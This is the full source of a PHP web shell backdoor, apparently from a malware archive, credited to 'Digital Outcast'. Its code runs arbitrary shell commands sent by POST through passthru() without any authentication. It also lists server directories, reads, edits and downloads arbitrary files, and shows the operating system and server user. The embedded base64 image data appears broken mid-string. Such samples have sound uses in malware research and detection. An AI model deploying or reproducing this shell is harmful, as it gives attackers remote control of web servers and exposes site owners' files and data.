MalwareSourceCode/PHP/Backdoor.PHP.WebShell.af

268 lines
69 KiB
Plaintext
Raw Normal View History

2020-10-10 03:05:41 +00:00
<?php
//This PHP Web Shell was developed by Digital Outcast It is open software and completely free to modify in any way you wish. Have fun and don't be all skiddy and just take credit for creating it. Bad things will happen if you do.
$images = array( "banner" =>"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".
"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", "edit" => "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
"zMshADs=");
//This function sends the appropriate headers to handle the image (This is just GIF images easily modifiable
if (isset($_GET['img']))
{
header("Content-type: image/gif");
echo base64_decode($images[$_GET['img']]);
die();
}
//Sets the directory to the directory specified
if (isset($_GET['dir']))
{
$current_dir = realpath($_GET['dir'])."/";
}
else
{
$current_dir = './';
}
//Run a CLI command if one has been sent
if (isset($_POST['CLICommand']))
{
echo "<pre>";
echo "<b>Output From Command: </b><br />";
echo "<textarea cols='120' rows='25'>";
passthru($_POST['CLICommand']);
echo "</textarea>";
echo "</pre>";
die();
}
//set the current_dir url
if (($current_dir == './') && (!isset($_COOKIE['dshell'])))
{
$surl = $_SERVER['REQUEST_URI'];
setcookie('dshell',$surl,time()+99999);
}
elseif (!isset($_COOKIE['dshell']))
die('Error Could Not load the default path');
else
$surl = $_COOKIE['dshell'];
function scan_dir($current_dir)
{
$chemin=$current_dir;
if (glob("$chemin*"))
{
$files = glob("$chemin*");
$fileListing = "";
foreach ($files as $filename) {
$fileListing .= "$filename-<";
}
$listing = explode('-<',$fileListing);
return $listing;
}
else
{
die("Couldn't Read directory, Blocked!!!");
}
}
//The majority of this function was taken off of php.net, no use reinventing the wheel when this works very well :p
//Anyway this function gets the permssions in rwx form thats read write execute format.
function perms_check($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
//Function to display the files in the current_dir variable
function dir_scan($current_dir) {
$output="<tr><td><font color='red'>Filename</font></td><td><font color='red'>Permissions</font></td><td><font color='red'>Actions</font></td></tr>\n
<tr><td><a href='?dir=".$current_dir."./'>.</a></td></tr>\n
<tr><td><a href='?dir=".$current_dir."../'>..</a></td></tr>";
$output_left="";
foreach(scan_dir($current_dir) as $item)
{
if ($item == "." || $item == "..")
{
$item = str_replace($current_dir,"",$item);
$output .= "<tr><td width='90%'>".
"<a href='".$item."'>".$item."</a>".
"</td><td>".
"</td></tr>";
}
else
{
if ($item == "")
{ }
else
{
if (is_dir($item))
{
$perms = perms_check($item);
$item = str_replace($current_dir,"",$item);
$output .="<tr><td width='90%'>"."<a href='?dir=".$current_dir.$item."/'>".$item."</a></td><td width='10%'>$perms</td><td>&nbsp&nbsp</td></tr>";
}
else
{
$perms = perms_check($item);
$item = str_replace($current_dir,"",$item);
$output_left .= "<tr><td width='90%'>".
"<a href='".$item."'>".$item."</a>".
"</td><td width='10%'>$perms</td><td>".
"<a href='?action=download&file=".$current_dir.$item."'><img src='".$surl."?img=download' border='0'></a><a href='".$surl."?action=edit&file=".$current_dir.$item."'><img src='".$surl."?img=edit' border='0'></a><br />".
"</td></tr>";
}
}
}
}
$output .=$output_left;
return $output;
}
//Edit File Function, $mode can be r(read) w(write)
//Content is needed only if writing
function fedit($fileLocale,$mode,$content = "")
{
if ($mode == "r")
{
$output = htmlspecialchars(file_get_contents($fileLocale));
return $output;
}
elseif ($mode == "w")
{
if ($content == "")
echo("Error No Content Provided!");
else {
$file = fopen($fileLocale,"w");
if (fwrite($file,stripslashes($content)))
{
$value = 1;
}
else
$value = 0;
fclose($file);
return $value;
}
}
}
//Function for showing the edit page.
function edit($file)
{
return "<tr><td><center><form action='".$surl."?action=write&file=".$_GET['file']."' method='post'>
<textarea name='content' cols=100 rows=15>".fedit($file,'r')."</textarea><br /><input type='submit' value='Save'></center></form></td></tr>";
}
//Setup the Action
if (!isset($_GET['action']))
{
$action = dir_scan($current_dir);
}
elseif ($_GET['action'] == 'edit')
{
$action = edit($_GET['file']);
}
elseif ($_GET['action'] == 'write')
{
if (fedit($_GET['file'],'w',$_POST['content']))
$action = "<tr><td>Successful</td></tr>";
else
$action = "<tr><td>Error Writing File, Possible Permission Problem</td></tr>";
}
elseif ($_GET['action'] == 'download')
{
$filename = $_GET['file'];
$filename = trim($filename);
$file = $path.$filename;
$file_size = filesize($file);
if(strstr($HTTP_USER_AGENT, "MSIE 5.5")) {
header("Content-Type: doesn/matter");
header("Content-Disposition: filename=$filename");
header("Content-Transfer-Encoding: binary");
header("Pragma: no-cache");
header("Expires: 0");
}
else {
Header("Content-type: file/unknown");
Header("Content-Disposition: attachment; filename=".str_replace("../","",$filename));
Header("Content-Description: PHP3 Generated Data");
header("Pragma: no-cache");
header("Expires: 0");
}
if (is_file("$file")) {
$fp = fopen("$file", "r");
if (!fpassthru($fp))
fclose($fp);
}
die();
}
//Actual Output
echo "<html><body bgcolor='black' text='white'>\n";
echo "<center>\n";
echo "<table width='90%'>\n";
echo "<tr><td colspan='2'><center><img src='".$surl."?img=banner'></center></td></tr>\n";
echo "<tr><td colspan='2'><b>Operating System Information: </b>".php_uname()."</td></tr>\n";
echo "<tr><td colspan='2'><b>Server Running As: </b>".get_current_user()."</td></tr>\n";
echo "<tr><td colspan='2'><b>Current Directory: </b>".wordwrap(realpath($current_dir),100,'<br />')."</td></tr>\n";
echo $action;
echo "<tr><td colspan='2'>&nbsp</td></tr>";
echo "<tr><td colspan='2'><b>Run Command: </b><form action='' method='post'><input type='text' name='CLICommand'><input type='submit' value='Run!'></form></td></tr>\n";
echo "</table></center>\n";
echo "</body></html>\n";
?>